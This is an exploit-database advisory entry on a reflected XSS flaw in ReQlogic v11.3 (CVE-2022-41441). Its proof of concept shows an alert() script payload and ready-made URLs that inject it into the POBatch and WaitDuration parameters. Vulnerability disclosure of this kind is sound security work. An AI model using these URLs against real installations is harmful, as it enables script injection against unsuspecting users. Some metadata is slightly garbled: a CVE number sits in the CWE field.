header-logo
Suggest Exploit
vendor:
ReQlogic
by:
Okan Kurtulus
9.3
CVSS
CRITICAL
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: ReQlogic
Affected Version From: 11.3
Affected Version To: 11.3
Patch Exists: NO
Related CWE: 2022-41441
CPE: a:reqlogic:reqlogic:11.3
Metasploit:
Other Scripts:
Platforms Tested: Linux
2022

ReQlogic v11.3 – Reflected Cross-Site Scripting (XSS)

ReQlogic v11.3 is vulnerable to Reflected Cross-Site Scripting (XSS). An attacker can exploit this vulnerability by sending a malicious payload to the POBatch and WaitDuration parameters. The malicious payload is triggered when the user visits the URL with the malicious payload.

Mitigation:

Input validation should be used to prevent XSS attacks. The application should validate all user input and reject any malicious input.
Source

Exploit-DB raw data:

# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
# Date: 9 October 2022
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://reqlogic.com
# Version: 11.3
# Tested on: Linux
# CVE : 2022-41441

# Proof of Concept:
1- Install ReQlogic v11.3
2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3
3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.

#XSS Payload:
</script><script>alert(1)</script>

#Affected Prameters
POBatch
WaitDuration

#Final URLs
http://localost:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3
http://localost:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>